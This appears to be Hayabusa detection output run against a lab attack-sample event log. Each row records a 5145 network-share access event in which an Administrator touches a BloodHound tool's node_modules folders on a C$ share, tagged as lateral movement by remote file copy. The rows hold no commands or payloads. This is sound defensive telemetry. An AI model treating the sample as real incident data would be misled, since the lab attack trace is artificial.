2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
